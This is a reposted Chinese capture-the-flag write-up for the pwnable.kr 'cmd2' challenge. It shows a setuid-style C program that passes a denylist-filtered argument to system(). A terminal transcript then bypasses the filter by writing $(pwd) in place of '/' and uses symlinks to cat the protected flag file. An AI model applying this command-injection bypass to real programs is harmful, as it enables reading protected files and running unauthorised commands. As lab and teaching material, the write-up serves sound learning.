#pwnable#cmd2

cmd2@pwnable:~$ cat cmd2.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

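/*
 * Count how many denylisted substrings occur in cmd.
 *
 * cmd: NUL-terminated command line; NULL is accepted and treated as
 *      rejected (returns 1) instead of being passed to strstr().
 * Returns the number of denylist entries found (0 means "allowed").
 *
 * Matching is a plain case-sensitive strstr() per entry, so each entry
 * contributes at most 1 no matter how often it appears. This is a
 * substring denylist on text that is later handed to a shell; it only
 * sees the literal bytes, not what the shell expands them to.
 */
int filter(char* cmd){
 static const char *const banned[] = { "=", "PATH", "export", "/", "`", "flag" };
 if (cmd == NULL) return 1;          /* missing input: reject rather than dereference NULL */
 int r = 0;
 for (size_t i = 0; i < sizeof banned / sizeof banned[0]; i++)
  r += strstr(cmd, banned[i]) != NULL;
 return r;
}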

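extern char** environ;
/*
 * Overwrite every environment string in place with zero bytes.
 *
 * The pointer array itself is left intact: after the call each entry is
 * the empty string, so no "NAME=value" pair remains to be found. The
 * strings are still reachable through environ, so the compiler cannot
 * drop the memset as a dead store. A NULL environ (no environment at
 * all) is a no-op instead of a NULL dereference.
 */
void delete_env(){
 if (environ == NULL) return;
 for (char** p = environ; *p; p++)
  memset(*p, 0, strlen(*p));
}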

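/*
 * Wipe the inherited environment, pin PATH to a non-existent directory,
 * then echo and run argv[1] through the shell unless filter() rejects it.
 *
 * The only control between the untrusted argument and system() is the
 * substring denylist in filter(). Because system() runs the string via
 * the shell, shell expansion happens after the check, so a denylist on
 * the literal bytes does not bound what the shell ultimately executes
 * (the transcript below shows this). PATH is replaced so bare command
 * names do not resolve, but commands named by full path are unaffected.
 * Returns 0 in every case; system()'s status is not examined.
 */
int main(int argc, char* argv[], char** envp){
 (void)envp;                         /* unused: the environment is wiped via environ instead */
 delete_env();
 putenv("PATH=/no_command_execution_until_you_become_a_hacker");
 if (argc < 2 || argv[1] == NULL) return 0;   /* no argument: avoid passing NULL to filter()/printf */
 if(filter(argv[1])) return 0;
 printf("%s\n", argv[1]);
 system( argv[1] );
 return 0;
}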

解题过程:

cmd2@pwnable:/$ pwd
/
cmd2@pwnable:/$ /home/cmd2/cmd2 "$(pwd)bin$(pwd)cat $(pwd)home$(pwd)cmd2$(pwd)flag
> ^C
cmd2@pwnable:/$ /home/cmd2/cmd2 "$(pwd)bin$(pwd)cat $(pwd)home$(pwd)cmd2$(pwd)flag"
cmd2@pwnable:/$ /home/cmd2/cmd2 "$(pwd)bin$(pwd)cat $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc"
cmd2@pwnable:/$ /home/cmd2/cmd2 "$(pwd)tmp$(pwd)gwcmd2$(pwd)bbb $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc"
cmd2@pwnable:/$ /home/cmd2
cmd2/ cmd2_pwn/ 
cmd2@pwnable:/$ /home/cmd2/cmd2 'test'
test
cmd2@pwnable:/$ /home/cmd2/cmd2 "$(pwd)"
cmd2@pwnable:/$ /home/cmd2/cmd2 '"$(pwd)"'
"$(pwd)"
sh: 1: /: Permission denied
cmd2@pwnable:/$ /home/cmd2/cmd2 '"$(pwd)tmp$(pwd)gwcmd2$(pwd)bbb $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc"'
"$(pwd)tmp$(pwd)gwcmd2$(pwd)bbb $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc"
sh: 1: /tmp/gwcmd2/bbb /tmp/gwcmd2/ccc: not found
cmd2@pwnable:/$ ls /tmp/gwcmd2/
aaaaa bbb ccc
cmd2@pwnable:/$ ls /tmp/gwcmd2/ -al
total 342244
drwxrwxr-x 2 cmd2 cmd2 4096 Mar 26 11:05 .
drwxrwx-wt 1708 root root 350445568 Mar 26 11:34 ..
lrwxrwxrwx 1 cmd2 cmd2 15 Mar 26 11:05 aaaaa -> /home/cmd2/cmd2
lrwxrwxrwx 1 cmd2 cmd2 8 Mar 26 11:05 bbb -> /bin/cat
lrwxrwxrwx 1 cmd2 cmd2 15 Mar 26 11:05 ccc -> /home/cmd2/flag
cmd2@pwnable:/$ ./tmp/gwcmd2/bbb 'test'
./tmp/gwcmd2/bbb: test: No such file or directory
cmd2@pwnable:/$ /home/cmd2/cmd2 '""$(pwd)tmp$(pwd)gwcmd2$(pwd)bbb $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc""'
""$(pwd)tmp$(pwd)gwcmd2$(pwd)bbb $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc""
FuN_w1th_5h3ll_v4riabl3s_haha
cmd2@pwnable:/$ /home/cmd2/cmd2 ""$(pwd)tmp$(pwd)gwcmd2$(pwd)bbb $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc""
cmd2@pwnable:/$ /home/cmd2/cmd2 '$(pwd)tmp$(pwd)gwcmd2$(pwd)bbb $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc'
$(pwd)tmp$(pwd)gwcmd2$(pwd)bbb $(pwd)tmp$(pwd)gwcmd2$(pwd)ccc
FuN_w1th_5h3ll_v4riabl3s_haha

必须要 '"" xxx ""' 才能被正确执行?
""xx"" 会被过滤
'"xx"' 提示 not found
' ' 也可以哦
所以要用单引号,否则可能内容被解释了。

不过能想到切换根目录,用 $(pwd) 绕过 '/' 的思路,也是够牛逼了,还要懂特殊的shell命令格式。






转载自www.cnblogs.com/handt/p/12590199.html